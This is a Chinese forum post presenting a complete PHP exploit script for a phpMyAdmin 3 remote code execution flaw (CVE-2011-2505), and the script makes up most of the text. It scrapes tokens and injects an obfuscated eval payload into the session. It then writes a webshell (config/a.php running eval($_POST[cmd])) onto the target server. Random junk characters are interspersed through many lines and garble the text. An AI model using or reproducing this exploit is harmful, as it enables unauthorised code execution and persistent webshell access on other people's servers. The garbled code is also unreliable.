phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。

昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。
9 z( P4 c5 p9 a; q* a0 A
首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
5 Z3 \- u7 B% m二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。

# }$ f% o/ A# l# J1 Y* Y/ D" S在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
' f( t& [4 L& x
+ u4 L( \2 Y1 }! o& L于是写了这个php版本的exp，代码如下：

#!/usr/bin/php
: A& ~" Y4 K7 _3 H<?php
print_r('
, i' B3 P2 R2 h! t* Y/ F* q+---------------------------------------------------------------------------+
# k& p1 g, P- p5 Cpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
/ `3 D( z4 u. F) X+ ~by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
% S+ B; O3 g) z: jAssigned CVE id: CVE-2011-2505
' m4 Q, e$ j& c+ d4 X: f! T, Z+---------------------------------------------------------------------------+
, I( l. H6 y5 E* C4 P# a9 X* d; I');
  R$ v1 z& Z. y6 ]. P8 ~& f# Q
/**
: e8 E) |9 B: {4 V# T/ f * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
- j/ a/ X. t3 {' E, A2 S3 a6 M+ y# Jhost:      target server (ip/hostname)
path:      path to pma3
8 z7 d8 a9 u  g4 D9 KExample:
# Y) v2 t6 r' E% D% Tphp '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];
, d4 _6 H4 b$ R3 k5 n
. A7 |% r- }% N6 |* x( R4 ]6 \7 c7 v/**
* Try to determine if the directory:"config" exists
**/
0 o  C* v* y+ _+ x- D% jecho "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

4 X+ P4 o2 ^: ~) v0 k# w4 X5 A/**
) @/ C5 N( Q) h * Try to get token and sessionid
8 A$ A5 l9 u. T9 B6 o**/
8 }% O" W) f* e- j- K' wecho "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
4 G" s) D& v7 I% d# D5 d( Tif($token && $sessionid){
! C9 k  s, y+ c& T3 k5 S    echo "[+] tokentoken\n";
8 P1 p, q5 u3 y- ?4 R6 N    echo "[+] Session IDsessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
  \3 @5 }% J" x8 |2 _, s; E
% u  G6 E: j4 s( [* T/**
+ r, L' k' o+ k$ N7 f: x" T, n * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

9 `8 D/ _" D8 q: |/**
1 M" C; ?. P  H * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
  l' b5 l; \/ \/**
6 j. u2 t6 l! `! d; m * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
  @# M& o+ K  m9 S1 f8 Aif(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

function php_request($url,$data='',$cookie=''){
0 h$ _- q$ n; X% e7 i% @% i    global  $host, $path;
# ^3 M0 ^* O: L* Y, v7 v0 h   
* v) r8 u& E& J0 ^    $method=$data?'POST':'GET';
   
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
8 |& p9 O8 q, j8 A& `    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
0 Y; K0 J, F5 A! y7 R3 S/ c    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
/ g3 P% q7 B: W8 o; F' q    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
6 Z4 a1 J& ^7 L6 E    $packet .= $data?$data:"";
4 D) [* _& D7 ^2 }
# X/ u4 B* n) {' p' B5 o& e    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
9 A$ T2 D3 z; w& {  x% ]" p; [4 Z3 a, C+ o9 B    echo 'No response from '.$host; die;
9 ^" r: T* r  d* j: p# {    }
) Q6 n& R' d6 t+ Y* v7 T) U& W' P    fputs($fp, $packet);
. q) C: s% s' \1 \
: b0 e/ O) b" F! r8 u8 X, f    $resp = '';
+ F4 ^* V; w% V$ N6 j
, q" Y: p' a3 h1 n- Q. v. R( w+ M    while ($fp && !feof($fp))
( S- p* T- {% Z: j- p" H        $resp .= fread($fp, 1024);
: {6 T- ]+ r& C; k. t+ q
    return $resp;
}
1 r, q9 [/ S5 |6 F   
?>
.